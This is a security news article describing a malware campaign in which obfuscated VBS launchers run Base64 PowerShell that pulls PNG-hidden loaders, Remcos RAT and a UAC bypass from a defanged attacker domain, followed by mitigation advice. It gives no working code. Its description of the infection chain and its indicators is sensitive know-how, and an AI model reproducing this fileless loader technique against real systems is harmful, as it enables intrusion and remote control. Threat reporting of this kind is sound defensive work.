A complex malware campaign has emerged, leveraging obfuscated Visual Basic Script (VBS) files, PNG-based loaders, and remote access trojans (RATs) to infiltrate systems while avoiding disk detection.
Initially appearing as a routine endpoint alert in early 2026, the attack unveiled a sophisticated structure capable of deploying various malware payloads through distinct attack sequences, all managed from a unified infrastructure.
Detection and Initial Findings
The campaign’s first indication was a dubious VBS file, Name_File.vbs, located in the UsersPublicDownloads directory of an infected system. SentinelOne’s endpoint protection intercepted and isolated the file before execution, yet the encoded contents warranted further analysis.
Upon decoding, a Base64-encoded PowerShell command was uncovered, featuring external network links—clear evidence that the file’s purpose was to retrieve additional elements remotely.
LevelBlue analysts discovered this single event was part of a broader operation. Their SpiderLabs Cyber Threat Intelligence team found an attacker-controlled domain hosting multiple obfuscated VBS files, each linked to different malware payloads, including XWorm variants and Remcos RAT.
Infrastructure and Attack Vectors
The attackers utilized the domain news4me[.]xyz with open directories like /coupon/, /protector/, and /invoice/, each serving specific roles such as staging VBS launchers or hosting obfuscated payload files.
This intentional open-directory setup allowed quick updates and rotations of hosted payloads without altering core delivery logic, creating a flexible and scalable system resilient to partial detection.
Investigations revealed a separate infection chain linked to a fake PDF, further confirming the campaign’s multi-vector approach.
Inside the Infection Mechanism
The infection process begins with a VBS file acting as a launcher, devoid of active malicious code. Stripping away Unicode obfuscation reveals a Base64-encoded PowerShell command, which functions as a fileless loader.
This command enforces TLS 1.2, using the Net.WebClient class to download a PNG image—MSI_PRO_with_b64.png. Although seemingly ordinary, it contains hidden data between custom markers, known as PhantomVAI, which loads directly into memory, bypassing most security controls.
Once executed, PhantomVAI accesses two URLs for further actions. The first, news4me[.]xyz/protector/johnremcos.txt, decodes into a Remcos RAT instance, granting persistent remote access. The second delivers a uac.png file with a UAC Bypass DLL, designed for silent privilege escalation.
Response and Prevention Measures
Organizations should restrict the execution of .vbs and .bat files from user-writable directories like UsersPublic and enforce constrained PowerShell policies with in-memory execution logging. At the network level, blocking WebDAV-based connections and filtering .xyz domains can limit access to attacker infrastructure.
Pairing endpoint protection with comprehensive threat intelligence investigations is crucial, as addressing a single alert is insufficient when the overarching infrastructure remains active and adaptable.
Stay updated with the latest cybersecurity news by following us on Google News, LinkedIn, and X. Set CSN as your preferred source for timely updates.
